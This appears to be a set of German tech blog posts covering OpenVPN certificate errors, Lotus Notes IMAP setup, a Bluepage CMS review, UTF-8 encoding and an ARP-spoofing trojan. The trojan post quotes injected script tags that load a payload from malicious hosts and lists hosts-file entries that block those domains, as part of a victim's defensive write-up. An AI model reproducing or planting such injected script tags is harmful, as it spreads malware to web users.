Fehlerursache in unserem Falle war die Übermittlung von normalen Berufe-IDs (Typ B) für die Ausbildungsanforderungen - dort gehören natürlich nur Berufe mit Typ A (also Ausbildungsberufe) hinein.

<ProfessionalTrainingQualifs> <ProfessionalTraining> <Title> <TitleCode>6548</TitleCode> </Title> </ProfessionalTraining> </ProfessionalTrainingQualifs>

Die CA-Datei für OpenVPN muss auf Client- wie auch auf Server-Seite das intermediate CA-Zertifikat und zusätzlich auch das CA-Stammzertifikat enthalten!

Fehlermeldungen:

• Logmeldungen am Client wenn das Stammzertifikat fehlt:
  VERIFY ERROR: depth=2, error=self signed certificate in certificate chain: /C=DE/O=Organisation_Name/OU=Certificate_Authority/CN=Organisation_root-CA/emailAddress=user@mydomain.de
TLS_ERROR: BIO read tls_read_plaintext error: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed
TLS Error: TLS object -> incoming plaintext read error
TLS Error: TLS handshake failed
Fatal TLS error (check_tls_errors_co), restarting
TCP/UDP: Closing socket

• Fehlt das root-CA serverseitig so wird die Verbindung ohne Fehlermeldung neu gestartet! Log: 
  TLS: Initial packet from #client_ip#
Connection reset, restarting [0]

Tipp: OpenVPN nutzt Zertifikate im .pem Format (CA-Zertifikat in .crt Form führt zu Fehlermeldung mit SSL_CTX_load_verify_locations()..)

Genutz wurde OpenVPN 2.1-rc7 auf Ubuntu und Client auf Windows Vista

Ja, Orgadata Logikal läuft mit Windows Vista.

Quelle: Technischer Support

1: Dialog: Haken bei “Internet Email Server (POP oder IMAP, SMTP)” setzen -> Weiter

2. Dialog: “IMAP” in der Auswahlbox auswählen und unten bei Server “imap.googlemail.com” eingeben -> Weiter

3. Dialog: Als Benutzername die volle Email-Adresse eingeben, Passwort 2 eingeben und unten den Haken bei “SSL Verbindung nutzen” setzen -> Weiter

4. Dialog: Unten bei SMTP-Server “smtp.googlemail.com” eingeben -> Weiter

5. Dialog: Wieder die volle Email-Adresse eingeben, Internet-Mail-Domain unten kann frei bleiben

Damit ist das Assistenten-Setup erledigt, kommen wir zum zweiten Teil.

Man öffne in Lotus Notes das Adressbuch (3.Symbol auf der linken Seite). Im Adressbuch links sollte sich ganz unten der Punkt Erweitert/Advanced finden. Öffnet man das gibt es einen Unterpunkt Konten/Accounts. Darin befinden sich evtl. mehrere Accounts, den gerade erstellten Account auswählen und per Doppelklick die Einstellungen dazu aufrufen. Im ersten Tab sollte sich die Option “Protokoll:” finden welche auf “IMAP Online” gesetzt ist. Darauf einen Doppelklick und auf “IMAP Offline” ändern.

Jetzt nur noch kurz im zweiten Tab unter Erweitert/Advanced ob bei “Port Nummer” die 993 eingetragen ist, falls nicht dort schon die 993 eintragen ist. Die zweite Option “SSL Site Zertifikate akzeptieren” auf “Ja” setzen. Nach “Speichern & Schließen” sollte man per Klick auf Email (1.Symbol ganz links in Lotus Notes) auf die Mails zugreifen können.

Update: siehe unten wie man den Virus findet

Alle Webseiten welche geladen werden enthalten an erster Stelle den Code:

<script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script>

/* Update vom 07.07.2008: Es wird jetzt ein neues JS geladen: */
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>

Wirklich unschön wenn ein und derselbe eklige Trojaner das ganze Team blockiert.

Wir haben uns den Trojaner mittlerweile mit 7 PCs eingefangen, wo auch immer das Ding herkam.

Bis jetzt sieht es fast aus als könnte es ein Rootkit sein, da sowohl IE, FF wie auch Opera betroffen sind und Virenscanner ihn nicht finden,
verdächtige Prozesse sind auch nicht auszumachen.

Um dem Trojaner zumindest die Funktion zu nehmen kann man ganz einfach das Windows Hostfile editieren (c:\windows\system32\drivers\etc\hosts).
Dort folgende Einträge hinzufügen:
127.0.0.1 mx.content-type.cn
127.0.0.1 content-type.cn
127.0.0.1 ad.5iyy.info
127.0.0.1 5iyy.info
Danach folgendes in die Eingabeaufforderung (Start -> Ausführen) eingeben:
ipconfig /flushdns

Damit spielt man dem System vor, dass die Domain mx.content-type.cn auf dem eigenen PC liegt wodurch das Script nicht mehr geladen werden kann. Der Trojaner ist dann zumindest nicht mehr gefährlich, wenn er auch noch nicht gelöscht ist.

Folgende Virenscanner erkennen das Ding bisher nicht:

• AntivirXP/Avira
• LavaSoft Ad-Aware
• Spybot Search&Destroy
• Kaspersky Online Scanner
• Kaspersky AntiVirus
• AVG Antivirus
• AVAST Antivirus
• CCleaner

Es gibt ein Update wenn bekannt ist wie man das Teil los wird.

Schönen Gruß an mx.content-type.cn und ad.5iyy.info

Update:
Teilweise scheint der Trojaner inaktiv zu sein, nach Neustart der Netzwerkverbindung war er plötzlich wieder an Bord und in allen Browsern (ohne die Browser neu zu starten).
Es sieht danach aus als würde das Teil eine Art “unsichtbaren” (rootkit?) lokalen Proxy starten über welchen dann der komplette Traffic läuft.

Update, wir sind dem Problem auf der Spur!

Der Trojaner befindet sich nicht auf dem PC auf dem er zu sein scheint.
Probiert folgendes aus um den tatsächlichen Verursacher zu finden:

Auf dem PC auf dem der Javascript-Code eingefügt wird:
Start -> ausführen -> cmd -> “arp -a”
Ihr solltet dann eine Tabelle in folgender Form finden:
Internet Address Physical Address Type
192.168.1.1 00-40-f4-9e-57-21 dynamic
192.168.1.5 00-40-f4-9e-57-27 dynamic
192.168.1.119 00-40-f4-9e-57-21 dynamic

Sucht darin nach der “Physical Address” des Gateway-Computers oder einfach nur nach evtl. doppelt vorkommenden Adressen in der zweiten Spalte.
In kopiertem Beispiel war der PC mit der echten Adresse “192.168.1.119″ der Verursacher des Übels.
Auf diesem läuft das Schadprogramm. Wir sind gerade dabei dort nach Viren zu scannen.

English version:

If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> this is the solution for your problem.

The cause is a trojan horse (virus) on another computer in your network!

This other computer is telling your PC that it is the gateway to the internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the internet and filters it in order to put its malicious code.

You can find out which computer is the evil one by typing following into your command line:
arp -a
In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan).
 

Ursprünglich dachte ich, es handelt sich dabei um ein OpenSource Projekt und kann beliebig modifiziert werden, dem ist aber nicht so.

Features

Im wesentlichen bietet Bluepage Funktionen wie sie auch von anderen CMS bekannt sind, z.B.:

• Templates (Layoutvorlagen)
• Intuitive Eingabe von Inhalten (WYSIWYG)
• Mehrsprachigkeit

Was es z.B. nicht kann (fällt hier auf, da in dem speziellen Projekt gefordert):

• Suchmaschinenfreundliche Links
• Verwaltung von mehreren Internetseiten über ein System

Für Bluepage CMS sind außerdem diverse Zusatzmodule, wie z.B. Veranstaltungskalender erhältlich.

Kein Opensource

Vorteile

Es gibt eine Firma welche das System professionell betreut und im Problemfall auch direkt in die Pflicht genommen werden kann. Sicherheitslücken werden kaum gezielt angegriffen.

Die Onlinehilfe des System könnte durchaus besser ausfallen als bei freien Alternativen, da dessen Qualität sich direkt in Einsparungen für den Anbieter auswirkt.

Nachteile

Bluepage CMS kann nicht separat erworben werden, sondern ausschließlich im Paket mit Webdesign der Firma ISS Oberlausitz, Basispreis ist laut Auskunft ca. 1500€. 

Der gravierendste Nachteil ist aber: Per Lizenz sind Modifikationen am System durch andere Firmen verboten!

Sollte man Bluepage CMS einsetzen oder einsetzen wollen, macht man sich damit zu 100% abhängig vom Anbieter und dessen Knowhow. Jeglicher Eingriff in die Software ist verboten bzw. darf nur von ISS Oberlausitz ausgeführt werden.

Bei einer Internetseite welche sich weiterentwickelt und für welche man durchaus auch spezielle Änderungen brauchen kann, ist dies aus meiner Sicht das Killer-Argument.

Wettbewerb wird für vorhandene Internetseiten damit ausgeschlossen.

Ein Vergleich: Sie lassen von Firma Fritz Muster ein Haus bauen, es wird vertraglich festgelegt, dass jede Änderung am Haus nur durch Firma Fritz Muster durchgeführt werden darf. Nun stellen Sie sich vor: Sie möchten eine effizientere Heizung einbauen, Sie möchten einen Wintergarten anbauen…

Fazit

Durch die Einschränkungen der Lizenzbedingungen rate ich vom Einsatz des Bluepage CMS generell ab.

Die Lizenz verbietet jegliche eigenständige Veränderungen, damit verschließt man sich dem Knowhow anderer Dienstleister und den Vorteilen von Wettbewerb. Erweiterungen sind dazu verdammt kostspielig zu werden.

Ausnahme bilden Internetauftritte welche einen begrenzten Anspruch haben der vom Anbieter des Systems zweifelsfrei abgedeckt werden kann und welche über lange Zeit funktionell gleich bleiben. Man sollte sich natürlich mit der Anbieterbindung wohl fühlen.

Vielleicht sollte sich der Anbieter zu einer Lockerung der Lizenzbestimmungen entschließen.

Alternativen

Für viele Nutzer von Bluepage kommt das freie Redaktionssystem Redaxo in Frage, dies bietet mit vielen Erweiterungen ähnlichen bzw. mehr Umfang als Bluepage CMS.

Grundsätzlich bei allen freien Alternativen hat man als Nutzer die Möglichkeit Angebote von verschiedenen Dienstleistern einzuholen und vor allem bei Erweiterungen von Spezialisten-Knowhow zu profitieren.

Schaut man zu grösseren Webportalen in der Branche, scheint utf8 doch bei der ein oder anderen Site im Einsatz; bei kleineren Websites, ob von Unternehmen oder privat bietet sich allerdings ein anderes Bild, der Standard heißt eindeutig ISO-8859-1 oder wird sogar durch ISO-8859-15 ersetzt.
Der ISO-Standard hat den klaren Nachteil, dass sich z.B. Umlaute oder ander fremsprachliche Zeichen nur durch HTML-Codes darstellen lassen, ein echtes ö im Code führt zwangsläufig zu einer kryptischen Ausgabe.

Warum?
Es scheint, dass utf8 einfach noch nicht angekommen ist bzw. in der Vorbild-Seite eben ISO angegeben war. Nicht jeder möchte sich explizit mit der Bedeutung der vielen HTML-Tags seiner Seite auseinandersetzen.
Alte Arbeitsweisen lassen sich eben doch nicht so einfach abschütteln.

Vorteile von UTF-8 bzw. Unicode-Zeichensätzen:

• mehrsprachige Websites
• problemfreie Einbinden von fremdem Code, z.B. durch RSS bzw. content syndication
• Einsparung von Schreibarbeit durch Wegfall von HTML-Codes z.B. für Umlaute
• erspart jegliches Nachdenken über Zeichensätze bei zukünfigen Änderungen (Vereinfachung durch Vereinheitlichung)
• entspricht aktuellen Web-Standards (Wir machen es richtig - effekt )

Nachteile:

• Umgewöhnung
• mögliche Umstellungsschwierigkeiten bei vorhandenen Websites und Datenbanken

Also, folgendes in den Website-Code:

<meta http-equiv=”content-type” content=”text/html; charset=utf-8″ />

Bei xhtml ist es eigentlich gar überflüssig, da utf8 eindeutig Standard ist und keiner extra Erwähnung bedarf.

Eigentlich hatte ich eine stärkere Diskrepanz zwischen Alexa und IVW erwartet, da Alexa im deutschsprachigen Raum eher beschränkt aussagefähig ist. Die einzigen Ausreisser sind hier aber stern.de und ftd.de.

Warum dann TOPFüber?  Vergiß den Blog, lass ein Jahr vergehen und komm wieder.

Wozu?  Um meine Erfahrungen mit Webtechnologien weiterzugeben.

Was genau?  Alles was uns vorwärts bringt und den Webmaster bewegt. CSS, JQuery, HTML, XTCommerce, Marketing, Wawis.

Wissen für die Konkurrenz?  Was man hier lernt, hat man nicht als erster. Und es muss immer gute Gründe geben besser zu werden.